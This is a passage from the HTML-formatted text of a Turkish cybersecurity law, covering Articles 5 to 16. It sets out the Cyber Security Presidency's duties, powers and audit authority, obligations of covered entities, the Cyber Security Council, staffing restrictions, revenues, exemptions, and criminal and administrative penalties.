<p class="Metin"><span>ç) Siber güvenlik tedbirlerinin, hizmet ve ürünlerin tüm yaşam döngüsü boyunca uygulanması esastır.<o:p></o:p></span></p>
<p class="Metin"><span>d) Siber güvenliğin sağlanmasına yönelik çalışmalarda öncelikle yerli ve milli ürünler tercih edilir.<o:p></o:p></span></p>
<p class="Metin"><span>e) Siber güvenlik politika ve stratejilerinin yürütülmesi ile siber saldırıların önlenmesi veya etkisinin azaltılmasına yönelik gerekli tedbirlerin alınmasından tüm kamu kurum ve kuruluşları ile gerçek ve tüzel kişiler sorumludur.<o:p></o:p></span></p>
<p class="Metin"><span>f) Siber güvenlik süreçlerinin yürütülmesinde hesap verebilirlik esastır.<o:p></o:p></span></p>
<p class="Metin"><span>g) Siber güvenlik politika ve strateji geliştirme çalışmaları sürekli gelişim yaklaşımı ile yürütülür.<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber güvenlik alanında nitelikli insan kaynağı kabiliyet ve kapasitesinin artırılmasına yönelik çalışmalar teşvik edilir.<o:p></o:p></span></p>
<p class="Metin"><span>h) Siber güvenlik kültürünün toplum geneline yaygınlaştırılması hedeflenir.<o:p></o:p></span></p>
<p class="Metin"><span>ı) Hukukun üstünlüğü, temel insan hak ve hürriyetleri ile mahremiyetin korunması ilkeleri temel esas kabul edilir.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>İKİNCİ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Görev, Yetki, Sorumluluk, Denetim ve Siber Güvenlik Kurulu<o:p></o:p></span></p>
<p class="Metin"><b><span>Başkanlığın görevleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 5- </span></b><span>(1) Başkanlığın görevleri şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) İlgili mevzuatta yer alan görevleri yapmak.<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>b) Kritik altyapılar ve bilişim sistemlerinin siber dayanıklılığının artırılmasına, siber saldırılara karşı korunmasına, gerçekleştirilen siber saldırıların tespitine, muhtemel saldırıların önlenmesine ve etkilerinin azaltılmasına veya ortadan kaldırılmasına yönelik faaliyet yürütmek, bu kapsamda zafiyet ve sızma testleri ile varlıklara yönelik risk analizleri yapmak veya yaptırmak, siber tehditlerle mücadele etmek, siber tehdit istihbaratı elde etmek, oluşturmak ve paylaşmak, zararlı yazılım inceleme faaliyetleri yürütmek.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>c) Kritik altyapılar ile ait oldukları kurumları ve konumları belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Kamu kurum ve kuruluşları ile kritik altyapıların veri <span class="GramE">envanteri</span> dâhil olmak üzere tüm varlıklarının envanterinin tutulmasını ve varlıklara yönelik risk analizinin gerçekleştirilmesini sağlamak, kamu kurum ve kuruluşları ile kritik altyapıların sahip olduğu varlıkların kritikliğine göre güvenlik tedbirlerini almak veya aldırmak.<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>d) <span class="SpellE">SOME’ler</span> kurmak, kurdurmak ve denetlemek, <span class="SpellE">SOME’lerin</span> olgunluk seviyelerinin belirlenmesi ve artırılması için çalışmalar yapmak, siber güvenlik tatbikatları gerçekleştirerek <span class="SpellE">SOME’lerin</span> siber olay müdahale kabiliyetlerini ölçmek, diğer ülkelerin siber olaylara müdahale ekipleriyle koordinasyon kurmak, her türlü siber müdahale aracının ve milli çözümlerin üretilmesi ve geliştirilmesi amacıyla çalışmalar yapmak, yaptırmak ve bunları teşvik etmek.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>e) Siber güvenlik alanında faaliyet gösterenlerin uyması gereken usul ve esasları düzenlemek.<o:p></o:p></span></p>
<p class="Metin"><span>f) Kamu kurum ve kuruluşları ile kritik kamu hizmetlerinin siber güvenliğini sağlamak amacıyla gerekli altyapıları kurmak, kurdurmak, işletmek, işlettirmek ve kamu kurum ve kuruluşlarına güvenli sistem ve altyapılar üzerinden barındırma hizmeti sunmak veya sunulmasını sağlamak, bu faaliyetlere yönelik uygulama usul ve esaslarını belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>g) Siber güvenlik alanına ilişkin standartları hazırlamak, diğer kişi veya kuruluşlarca hazırlanan standartları tetkik etmek, bunlar hakkında mütalaa vermek, uygun bulduğu takdirde standart olarak kabul etmek, bunları yayımlamak ve uygulanmalarını takip etmek.<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber güvenlik alanına ilişkin yazılım, donanım, ürün, sistem ve hizmetlere yönelik test ve sertifikasyon işlemlerini yürütmek, buna yönelik test altyapıları kurmak, kurdurmak ve işletmek ile siber güvenlik uzmanları ve şirketlerine yönelik sertifikasyon, yetkilendirme ve belgelendirme işlemlerini ilgili kurumlarla koordineli olarak yürütmek.<o:p></o:p></span></p>
<p class="Metin"><span>h) Siber güvenlik denetimini gerçekleştirmek ve sonucuna göre yaptırım uygulamak.<o:p></o:p></span></p>
<p class="Metin"><span>ı) Kamu kurum ve kuruluşları ile kritik altyapılarda kullanılacak siber güvenlik ürün ve hizmetleri ile bunları sağlayacak işletmelerin taşıması gereken niteliklere yönelik teknik <span class="GramE">kriterler</span> belirlemek ve mevzuat düzenlemeleri yapmak, bunların denetimini yapmak ya da yaptırmak, denetimleri yapacak kuruluşların taşımaları gereken nitelikleri belirlemek, bu kuruluşları görevlendirmek, gerektiğinde görevlendirmeyi geçici olarak durdurmak ya da iptal etmek.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yetkiler<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 6- </span></b><span>(1) Başkanlık, görevlerini yerine getirirken aşağıdaki yetkileri kullanır:<o:p></o:p></span></p>
<p class="Metin"><span>a) İlgili mevzuatta yer alan yetkileri kullanmak.<o:p></o:p></span></p>
<p class="Metin"><span>b) Bu Kanun kapsamındakilerin siber saldırılara karşı korunması ve bu saldırıların kaynağına karşı caydırıcılık sağlanması için gerekli tedbiri alır veya aldırır. Bu kapsamda bilişim sistemlerine uygun bulunan yazılım ve donanım ürünlerinin kurulum ve <span class="GramE">entegrasyonunu</span> sağlayabilir, bu ürünler tarafından üretilen veya toplanan veri ve <span class="SpellE">log</span> kayıtlarını Başkanlık yönetiminde bulunan bilişim sistemlerine aktarabilir, siber olayların tespitine yönelik gerekli yöntemi ve aracı kullanabilir.<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>c) Bu Kanun kapsamındakilerden siber olaya maruz kalanlara yerinde veya uzaktan siber olay müdahale desteği sağlayabilir, siber uzayda bulunan veya elde ettiği veri, imaj veya <span class="SpellE">log</span> kayıtları üzerinden saldırılara ait izleri takip edebilir, bunları inceleyerek <span class="SpellE">delillendirebilir</span>, suç teşkil ettiği değerlendirilen bulguları adli makamlar ve diğer ilgililer ile paylaşır, yurt içi ve yurt dışındaki paydaşlar ile koordinasyon sağlayabilir.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>ç) Bu Kanun kapsamındakilerden, yürüttüğü faaliyetlerle sınırlı olmak üzere bilgi, belge, veri ve kayıtları alabilir ve değerlendirmesini yapabilir, bunlara ait arşivlerden, elektronik bilgi işlem merkezlerinden ve iletişim altyapısından yararlanabilir ve bunlarla irtibat kurabilir. Bu kapsamda elde edilen bilgi, belge, veri ve kayıtlar, en fazla iki yıl süreyle çalışmaya konu edilir ve çalışma süresi sonrasında imha edilir. Bu kapsamda talepte bulunulanlar, kendi mevzuatındaki hükümleri gerekçe göstermek suretiyle talebin yerine getirilmesinden kaçınamazlar.<o:p></o:p></span></p>
<p class="Metin"><span>d) Bilişim sistemlerindeki <span class="SpellE">log</span> kayıtlarını bünyesinde toplayabilir, saklayabilir, değerlendirebilir. Bunlar hakkında rapor hazırlayarak ilgili kurum ve kuruluşlar ile paylaşabilir.<o:p></o:p></span></p>
<p class="Metin"><span>e) Başkanlık, bakanlıklar ve diğer kamu kurum ve kuruluşları ile koordineli olarak siber güvenlik konularında ihtiyaç halinde personel tefrik edebilir.<o:p></o:p></span></p>
<p class="Metin"><span>f) Görev alanına giren konularda uluslararası kuruluşlar ve ülkelerle ilişkiler yürütebilir, bilgi alışverişinde bulunabilir, ülkemizi temsil edebilir ve koordinasyonu sağlayabilir, uluslararası kuruluşların çalışmalarına katılabilir, alınan kararların uygulanmasını takip edebilir ve gerekli koordinasyonu sağlayabilir.<o:p></o:p></span></p>
<p class="Metin"><span>g) Bu Kanun kapsamındaki kurum, kuruluş ve ilgili diğer gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşları sınıflandırabilir, faaliyetlerini icra ederken gerektiğinde sadece belirli bir kısmını kapsayan hükümler oluşturabilir.<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber güvenlik denetimi gerçekleştiren bağımsız denetçiler ve bağımsız denetim kuruluşlarını yetkilendirebilir, yetkisini süreli veya süresiz iptal edebilir.<o:p></o:p></span></p>
<p class="Metin"><span>h) Kamu kurum ve kuruluşları ile kritik altyapıların bilişim sistemlerinde kullanılacak ve siber güvenliğe etkisi olan yazılım, donanım, ürün ve hizmetlere dair <span class="GramE">kriterler</span> ile Başkanlığa yapılacak bildirimlere ilişkin usul ve esasları belirler.<o:p></o:p></span></p>
<p class="Metin"><span>ı) Siber güvenlik yazılım, donanım, ürün ve hizmetlerinin asgari güvenlik <span class="GramE">kriterlerini</span> belirler. Bunları sağlayacak veya tedarik edecek gerçek ve tüzel kişilere yönelik sertifikasyon, yetkilendirme ve belgelendirme süreçlerini yönetir. Siber güvenlik yazılım, donanım, ürün ve hizmetlerinin belirlenecek standartlara uygun hale getirilmesini talep edebilir, bu talebe uyum sağlamayanların kullanılmasını önleyici tedbirler alabilir.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Bu Kanun uyarınca yürütülen iş ve işlemler kapsamında kişisel veriler; hukuka ve dürüstlük kurallarına uygun şekilde, doğru ve gerektiğinde güncel olmak kaydıyla, belirli, açık ve meşru amaçlarla, işlendiği amaçla bağlantılı, sınırlı ve ölçülü olmak kaydıyla ve işlendiği amaç için gerekli olan süre kadar muhafaza edilmek üzere işlenir. Bu Kanunda belirtilen yetkiler çerçevesinde elde edilecek kişisel veriler ve ticari sırlar; bu verilere erişilmesini gerektiren sebeplerin ortadan kalkması halinde resen silinir, yok edilir veya anonim hale getirilir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Bu maddenin uygulanmasına ilişkin usul ve esaslar Cumhurbaşkanı tarafından çıkarılacak yönetmelikle belirlenir.<o:p></o:p></span></p>
<p class="Metin"><b><span>Sorumluluklar ve iş birliği<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 7- </span></b><span>(1) Bu Kanun kapsamında yer alan ve bilişim sistemleri kullanmak suretiyle hizmet sunan, veri toplayan, işleyen ve benzeri faaliyet yürütenlerin siber güvenliğe ilişkin görev ve sorumlulukları şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) Başkanlığın görev ve faaliyetleri kapsamında talep ettiği her türlü veri, bilgi, belge, donanım, yazılım ve diğer her türlü katkıyı öncelikle ve zamanında Başkanlığa iletmek.<o:p></o:p></span></p>
<p class="Metin"><span>b) Siber güvenliğe yönelik olarak milli güvenlik, kamu düzeni veya kamu hizmetinin gereği gibi yürütülmesi amacıyla mevzuatın öngördüğü tedbirleri almak, hizmet sundukları alanda tespit ettikleri zafiyet veya siber olayları gecikmeksizin Başkanlığa bildirmek.<o:p></o:p></span></p>
<p class="Metin"><span>c) Kamu kurumları ve kuruluşları ile kritik altyapılarda kullanılacak siber güvenlik ürün, sistem ve hizmetleri Başkanlık tarafından yetkilendirilmiş ve belgelendirilmiş siber güvenlik uzmanlarından, üreticilerden veya şirketlerden tedarik etmek.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Sertifikasyon, yetkilendirme ve belgelendirmeye tabi siber güvenlik şirketlerince faaliyete başlamadan önce mevcut düzenlemeler çerçevesinde Başkanlığın onayını almak.<o:p></o:p></span></p>
<p class="Metin"><span>d) Siber olgunluğun artırılmasına yönelik Başkanlık tarafından geliştirilen politika, strateji, eylem planı ile yayımlanan diğer düzenleyici işlemlerde yer alan hususları yerine getirmek ve gerekli tedbirleri almak.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlık, bu Kanunda belirtilen faaliyetlerin yürütülmesinde kamu kurum ve kuruluşları, gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşlarla iş birliği içerisinde çalışır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Denetim<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 8- </span></b><span>(1) Başkanlık, bu Kanunda belirtilen görevleri ile ilgili olarak gerekli gördüğü hallerde Kanunun kapsamına giren her türlü fiil ve işlemi denetleyebilir; bu amaçla mahallinde inceleme yapabilir veya yaptırabilir. Denetim, bu Kanun kapsamındaki kurum, kuruluş ve ilgili diğer gerçek ve tüzel kişilerin bu Kanun hükümleriyle ilgili faaliyet ve işlemlerini kapsar. Denetime Başkanlık personeli, yetkilendirilmiş ve belgelendirilmiş bağımsız denetçiler ve bağımsız denetim kuruluşları yetkilidir. Bu yetki, Başkan tarafından görevlendirilenler tarafından kullanılır. Kamu kurum ve kuruluşları ile kritik altyapılarda denetimler, Başkanlık personelince veya refakatinde yapılır.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlık, denetim faaliyetlerine ilişkin önemlilik ve öncelik ilkeleri ile risk değerlendirmelerinde dikkate alınacak ölçütleri ve uygulama esaslarını belirler. Denetim faaliyeti, önemlilik ve öncelik ilkeleri ile risk değerlendirmeleri kapsamında oluşturulacak program uyarınca yürütülür. Başkan, oluşturulan program dışında incelenmesi gerekli görülen hususlarda program dışı denetim yaptırabilir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Mülki amirler, kolluk kuvvetleri ve diğer kamu kurumlarının amir ve memurları inceleme veya denetimle görevlendirilenlere her türlü kolaylığı göstermek ve yardımda bulunmakla yükümlüdürler.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Denetimle görevlendirilenler; yürüttükleri denetim faaliyetleriyle sınırlı olarak elektronik ortamdaki verinin, belgelerin, elektronik altyapının, cihaz, sistem, yazılım ve donanımlarının incelenmesi, bunlardan kopya, dijital suret veya örnek alınması, konuyla ilgili yazılı veya sözlü açıklama istenmesi, gerekli tutanakların düzenlenmesi, tesislerin ve işletiminin incelenmesi konularında yetkilidir. Denetime tabi tutulanlar, ilgili cihaz, sistem, yazılım ve donanımları verilen sürelerde denetlemeye açık tutmak, denetim için gerekli altyapıyı temin etmek ve çalışır vaziyette tutmak için gerekli önlemleri almak zorundadır.<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>(5) Millî güvenlik, kamu düzeni, suç işlenmesinin veya siber saldırıların önlenmesi amacıyla hâkim kararı üzerine veya gecikmesinde sakınca bulunan hâllerde Cumhuriyet savcısının yazılı emri ile konutta, işyerinde ve kamuya açık olmayan kapalı alanlarda arama yapılabilir, uzun süreli hizmet aksamasına yol açmayacak ve kesintisiz şekilde kopya çıkarma ve el koyma işlemi gerçekleştirilebilir. </span></span><span>Çıkarılan kopyanın bir nüshası ilgilisine teslim edilir ve bu husus tutanağa geçirilerek imza altına alınır. Bu işlemlerin yapılabilmesi için makul sebeplerin oluştuğunun gerekçeleriyle birlikte gösterilmesi gerekir. Hâkim kararı olmaksızın yapılan arama ve gerçekleştirilen kopya çıkarma ve el koyma işlemleri <span class="SpellE">yirmidört</span> saat içinde görevli hâkimin onayına sunulur. Hâkim, kararını <span class="SpellE">kırksekiz</span> saat içinde açıklar; aksi hâlde çıkarılan kopyalar ve çözümü yapılan metinler derhâl imha edilir ve el koyma kendiliğinden kalkar. Yetkilendirilmiş veri merkezi işletmecilerinin veri merkezlerinde sadece hâkim kararıyla arama, kopya çıkarma ve el koyma işlemi yapılabilir. Bu fıkra kapsamına giren talepler bakımından Ankara sulh ceza hâkimliği yetkili ve görevlidir. Ancak kamu kurum ve kuruluşları bakımından hâkim kararı aranmaz.<o:p></o:p></span></p>
<p class="Metin"><b><span>Siber Güvenlik Kurulu<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 9- </span></b><span>(1) Siber Güvenlik Kurulu; Cumhurbaşkanı, Cumhurbaşkanı Yardımcısı, Adalet Bakanı, Dışişleri Bakanı, İçişleri Bakanı, Milli Savunma Bakanı, Sanayi ve Teknoloji Bakanı, Ulaştırma ve Altyapı Bakanı, Milli Güvenlik Kurulu Genel Sekreteri, Milli İstihbarat Teşkilatı Başkanı, Savunma <span class="SpellE">Sanayii</span> Başkanı ve Siber Güvenlik Başkanından oluşur. Cumhurbaşkanının katılmadığı hallerde Kurula Cumhurbaşkanı Yardımcısı başkanlık eder.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Kurul toplantılarına üyeler dışında, gündemin özelliğine göre ilgili bakan ve kişiler de çağrılarak bilgi ve görüş alınabilir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Kurul, görevleri kapsamında gerekli görmesi halinde komisyon ve çalışma grupları oluşturabilir. Komisyon ve çalışma grupları, Kurulun görev alanına giren hususlarda teknik düzeyde çalışmalar yapar ve karar önerileri oluşturur. Komisyon ve çalışma grubu toplantılarına görüşlerinden faydalanmak üzere alanında uzman kişiler davet edilebilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Kurulun görevleri şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) Siber güvenlikle ilgili politika, strateji, eylem planı ve diğer düzenleyici işlemlere yönelik kararları almak, alınan kararların tamamından veya bir kısmından istisna tutulacak kurum ve kuruluşları belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>b) Başkanlık tarafından hazırlanan siber güvenlik alanına ilişkin teknoloji yol haritasının ülke çapında uygulanmasına yönelik kararlar almak.<o:p></o:p></span></p>
<p class="Metin"><span>c) Siber güvenlik alanında teşvik verilecek öncelikli alanları belirlemek, siber güvenlik alanındaki insan kaynağının geliştirilmesine yönelik karar almak.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Kritik altyapı sektörlerini belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>d) Başkanlık ile kamu kurum ve kuruluşları arasında meydana gelebilecek ihtilaflar hakkında karar almak.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Kurulun sekretarya hizmetleri Başkanlık tarafından yürütülür. Kurul, komisyon ve çalışma gruplarının çalışma usul ve esasları Cumhurbaşkanı tarafından çıkarılacak yönetmelikle belirlenir.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>ÜÇÜNCÜ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Personele İlişkin Hükümler<o:p></o:p></span></p>
<p class="Metin"><b><span>Sözleşmeli uzman personel istihdamı<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 10- </span></b><span>(1) Başkanlıkta siber güvenliğin sağlanması ile ilgili görevleri yürütmek üzere sayısı Cumhurbaşkanınca belirlenecek sözleşmeli uzman personel çalıştırılabilir. Bu personelin nitelikleri, atanma şartları gibi istihdamlarına ilişkin hususlar ile bunlara verilecek her türlü ödemeler <span class="GramE">dahil</span> net ücretler, 14/7/1965 tarihli ve 657 sayılı Devlet Memurları Kanununun 4 üncü maddesinin (B) bendine göre çalıştırılanlar için uygulanmakta olan sözleşme ücret tavanının beş katını aşmamak üzere Siber Güvenlik Kurulu tarafından ilgililerin yürüteceği görevler göz önüne alınarak tespit edilir. Bu fıkra kapsamındaki personel, <span class="GramE">31/5/2006</span> tarihli ve 5510 sayılı Sosyal Sigortalar ve Genel Sağlık Sigortası Kanununun 4 üncü maddesinin birinci fıkrasının (a) bendi kapsamında sigortalı sayılır. Kanunlardaki özel hükümler saklı kalmak kaydıyla, bu statüde çalıştırılma, sözleşme bitiminde kamu kurum ve kuruluşlarında herhangi bir pozisyon, kadro veya statüde çalışma açısından kazanılmış hak teşkil etmez.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlıkta; geçici olarak görevlendirilenler de <span class="GramE">dahil</span> olmak üzere, görev alan tüm personele 7/4/2021 tarihli ve 7315 sayılı Güvenlik Soruşturması ve Arşiv Araştırması Kanunu uyarınca güvenlik soruşturması ve arşiv araştırması birlikte yapılır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Zorunlu hizmet yükümlülüklerinin devri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 11- </span></b><span>(1) Başkanlıkta istihdam edilen personelden ilgili mevzuatı kapsamında diğer kamu kurum ve kuruluşlarına karşı zorunlu hizmet yükümlülüğü bulunanların Başkanlıkta geçen hizmet süreleri, ilgili kamu kurum ve kuruluşunun da muvafakati alınmak kaydıyla, söz konusu yükümlülük sürelerinden düşülür.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yasak hükümler<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 12- </span></b><span>(1) Başkanlıkta kadrolu veya sözleşmeli statüde görev yapanlardan Başkanlık ile herhangi bir nedenle ilişiği kesilenler Başkanlıktan muvafakat almadan iki yıl süreyle yurt içi veya yurt dışında siber güvenlik alanında resmi veya özel başka hiçbir görev alamaz ve bu alanda ticaretle uğraşamaz, serbest meslek faaliyetinde bulunamaz ve özellikle bu sektörde faaliyet gösteren bir şirkette hissedar veya yönetici olamaz.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>(2) Başkanlıktaki görev ve faaliyetler kapsamında edinilen bilgi, belge ve benzeri her türlü verinin, Başkanlıkça yetki verilen durumlar hariç olmak üzere, radyo, televizyon, internet, sosyal medya, gazete, dergi, kitap ve diğer tüm medya araçları ile her türlü yazılı, görsel, işitsel ve elektronik kitle iletişim araçları vasıtasıyla yayımlanması veya açıklanması yasaktır.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><b><span>Sır saklama yükümlülüğü<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 13- </span></b><span>(1) Başkanlık tarafından yürütülen görev ve faaliyetler kapsamında edinilen kamuya, ilgililere ve üçüncü kişilere ait gizlilik taşıyan bilgiler, kişisel veriler, ticari sırlar ve bunlara ait belgeler mevzuat gereği yetkili kılınan mercilerden başkasına açıklanamaz, gerçek ve tüzel kişilerin menfaatine kullanılamaz.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>DÖRDÜNCÜ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Gelir ve Muafiyetler<o:p></o:p></span></p>
<p class="Metin"><b><span>Başkanlığın gelirleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 14- </span></b><span>(1) Başkanlığın gelirleri;<o:p></o:p></span></p>
<p class="Metin"><span>a) Genel bütçeden yapılacak Hazine yardımlarından,<o:p></o:p></span></p>
<p class="Metin"><span>b) Başkanlığın faaliyetlerinden elde edilen gelirlerden,<o:p></o:p></span></p>
<p class="Metin"><span>c) Başkanlık tarafından verilen idari para cezalarından elde edilen gelirlerden,<o:p></o:p></span></p>
<p class="Metin"><span>ç) Kanun ve kararnamelerle kurulu bulunan ve kurulacak olan fonların gelirlerinden Cumhurbaşkanı kararıyla yüzde 10’una kadar aktarılacak tutarlardan,<o:p></o:p></span></p>
<p class="Metin"><span>d) Diğer gelirlerden,<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>oluşur</span></span><span>.<o:p></o:p></span></p>
<p class="Metin"><b><span>Muafiyetler<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 15- </span></b><span>(1) Başkanlığın ihtiyaçları kapsamında yurt dışından ithalat veya hibe yoluyla sağlanacak her türlü malzeme, araç, gereç, makine, cihaz ve sistemleri ve bunların araştırma, geliştirme, eğitim, üretim, modernizasyon ve yazılımı ile yapım, bakım ve onarımlarında kullanılacak yedek parçalar, hammadde malzeme ile bedelsiz olarak dış kaynaklardan alınan yardım malzemeleri nedeniyle yapılacak işlemler gümrük vergisinden, fon ve resimlerden, harçlardan, bu işlemler nedeniyle düzenlenen kâğıtlar damga vergisinden istisnadır. </span></span><span>Bu istisna, Başkanlık adına yurt dışına onarım, modernizasyon, bakım, mahrece iade, değişim maksadıyla kati çıkış, geçici çıkış, bedelsiz ithalat ve giriş işlemlerinde de uygulanır.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlığın görevlerinin yürütülmesi sırasında ihtiyaç duyduğu her türlü malzeme, araç, gereç, makine, cihaz ve sistemlerin ithalatında ve yurt dışına çıkış aşamalarında, kamu kurum ve kuruluşlarından, gerçek ve tüzel kişilerden alınması gereken izin ve uygunluk belgesi aranmaz.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Kamu kurum ve kuruluşları ile diğer kurum ve kuruluşlar, bu Kanunda yazılı görevlerin yerine getirilmesi sırasında ihtiyaç duyulan hâllerde, kullanımlarında bulunan ve müsadere edilen her türlü malzeme, <span class="GramE">ekipman</span>, teçhizat ve cihazı, diğer kanunların bu konudaki düzenlemelerine bakılmaksızın Başkanlığa geçici olarak tahsis edebilir veya bedelsiz devredebilirler.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>BEŞİNCİ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Cezai Hükümler ve İdari Para Cezalarının Uygulanması<o:p></o:p></span></p>
<p class="Metin"><b><span>Cezai hükümler ve idari para cezaları<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 16- </span></b><span>(1) Kamu kurum ve kuruluşları hariç olmak üzere bu Kanunla yetkilendirilen mercilerin ve denetim görevlilerinin görev ve yetkileri kapsamında istedikleri bilgi, belge, yazılım, veri ve donanımı vermeyenler veya bunların alınmasına engel olanlar bir yıldan üç yıla kadar hapis ve <span class="SpellE">beşyüz</span> günden <span class="SpellE">binbeşyüz</span> güne kadar adli para cezası ile cezalandırılır.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>(2) Bu Kanun uyarınca alınması gerekli onay, yetki veya izinleri almaksızın faaliyet yürütenler iki yıldan dört yıla kadar hapis ve bin günden <span class="SpellE">ikibin</span> güne kadar adli para cezası ile cezalandırılır.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Sır saklama yükümlülüğünü yerine getirmeyenlere dört yıldan sekiz yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(4) Siber uzayda veri sızıntısı nedeniyle daha önce yer alan kişisel veya kritik kamu hizmeti kapsamına giren kurumsal verileri, kişilerin veya kurumların izni olmaksızın ücretli veya ücretsiz şekilde erişime açan, paylaşan veya satışa çıkaranlara üç yıldan beş yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(5) Siber uzayda veri sızıntısı olmadığını bildiği halde halk arasında endişe, korku ve panik yaratmak ya da kurumları veya şahısları hedef göstermek amacıyla siber güvenlikle ilgili veri sızıntısı olduğuna yönelik gerçeğe aykırı içerik oluşturanlara veya bu maksatla bu içerikleri yayanlara iki yıldan beş yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span> (6) Türkiye Cumhuriyeti’nin siber uzaydaki milli gücünü meydana getiren unsurlarına yönelik olarak siber saldırıda bulunan veya bu saldırı neticesinde elde ettiği her türlü veriyi siber uzayda bulunduranlara fiil daha ağır bir cezayı gerektiren başka bir suç oluşturmadığı takdirde sekiz yıldan <span class="SpellE">oniki</span> yıla kadar hapis cezası verilir. Bu saldırı neticesinde elde ettiği her türlü veriyi siber uzayda yayan, başka bir yere gönderen veya satışa çıkaranlara on yıldan <span class="SpellE">onbeş</span> yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(7) Yukarıdaki fıkralara göre verilecek ceza suçun kamu görevlisi tarafından işlenmesi halinde üçte bir oranında, birden fazla kişi tarafından işlenmesi halinde yarı oranında ve bir örgütün faaliyeti çerçevesinde işlenmesi halinde yarısından iki katına kadar artırılır.<o:p></o:p></span></p>
<p class="Metin"><span>(8) 12 <span class="SpellE">nci</span> maddeye aykırı davrananlara üç yıldan beş yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(9) Bu Kanundan kaynaklanan görev ve yetkilerini kötüye kullananlara veya kritik altyapıların siber saldırılara karşı korunması kapsamında görevinin gereklerine aykırı hareket etmek suretiyle veri ihlali yaşanmasına sebebiyet verenlere bir yıldan üç yıla kadar hapis cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(10) 7 <span class="SpellE">nci</span> maddenin birinci fıkrasının (b) ve (c) bentlerindeki görev ve sorumluluklarını yerine getirmeyenlere bir milyon Türk lirasından on milyon Türk lirasına kadar, 18 inci maddedeki görev ve sorumluluklarını yerine getirmeyenlere ise on milyon Türk lirasından yüz milyon Türk lirasına kadar idari para cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><span>(11) 8 inci maddenin dördüncü fıkrasındaki yükümlülüklerini yerine getirmeyenlere, <span class="SpellE">yüzbin</span> Türk lirasından bir milyon Türk lirasına kadar, bu yükümlülüklerin ticari şirketlerce yerine getirilmemesi halinde <span class="SpellE">yüzbin</span> Türk lirasından az olmamak üzere bağımsız denetimden geçmiş yıllık finansal tablolarında yer alan brüt satış <span class="GramE">hasılatının</span> yüzde 5’ine kadar idari para cezası verilir.<o:p></o:p></span></p>
<p class="Metin"><b><span>İdari para cezalarının uygulanması<o:p></o:p></span></b></p>
